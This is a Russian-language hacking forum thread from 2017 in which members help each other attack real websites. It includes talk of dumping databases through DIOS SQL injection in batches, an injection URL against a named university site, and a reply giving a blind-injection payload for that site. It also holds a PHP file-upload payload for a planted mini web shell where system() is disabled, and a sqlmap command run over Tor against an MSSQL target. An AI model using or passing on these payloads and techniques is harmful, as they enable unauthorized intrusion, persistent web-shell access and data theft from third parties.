20.08.2017, 18:30
|
|
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от st55
↑
Если у сайта есть возможность держать и работать с таким объёмом данных, скорей всего пропускная способность чуть выше.
Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.
|
|
|
20.08.2017, 19:57
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от SooLFaa
↑
Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.
В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!
|
|
|
|
20.08.2017, 19:58
|
|
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от cat1vo
↑
В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!
А вот это очень хорошее и грамотное дополнение...
|
|
|
|
20.08.2017, 23:58
|
|
Новичок
Регистрация: 19.01.2016
Сообщений: 15
Провел на форуме:
4609
Репутация:
0
|
|
А тут помогают раскрутить?
Нашел уязвимость, но как я только не пытался крутить.. бесполезно
параметр listcount
Или это обычная ошибка синтаксиса, а я голову ломаю? |
|
|
|
21.08.2017, 02:39
|
|
Новичок
Регистрация: 08.08.2017
Сообщений: 7
Провел на форуме:
1836
Репутация:
0
|
|
Ребята, недавно на одном из пабликов узнал о дополнении Tamper Data. Есть ещё что-нибудь подобное?
|
|
|
|
21.08.2017, 04:23
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Hedorda
↑
Ребята, недавно на одном из пабликов узнал о дополнении Tamper Data. Есть ещё что-нибудь подобное?
Да, Burp suite, ZAP proxy, Charles etc
|
|
|
|
22.08.2017, 14:57
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Помогите вывод сделать, на фильтр не похоже..
Код:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+
|
|
|
|
22.08.2017, 15:48
|
|
Познающий
Регистрация: 24.09.2015
Сообщений: 35
Провел на форуме:
11851
Репутация:
30
|
|
Сообщение от DezMond™
↑
Помогите вывод сделать, на фильтр не похоже..
Код:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+
Стоит ограничение на количество символов в переменной, так что крутить получится только как слепую
Код:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'or mid(database(),1,1)='t';%00
|
|
|
|
23.08.2017, 00:40
|
|
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
Провел на форуме:
37430
Репутация:
0
|
|
Сообщение от karkajoi
↑
Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку
Warning
: system() has been disabled for security reasons
я так понял она выключена в php.ini
как можно обойти?
Пробуй файл записать
Код:
cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=
|
|
|
|
24.08.2017, 13:24
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
Провел на форуме:
71531
Репутация:
0
|
|
Извините если не в том разделе,
возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment)
Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц.
На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая)
Направьте на путь истинный, подскажите методы решения.
Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
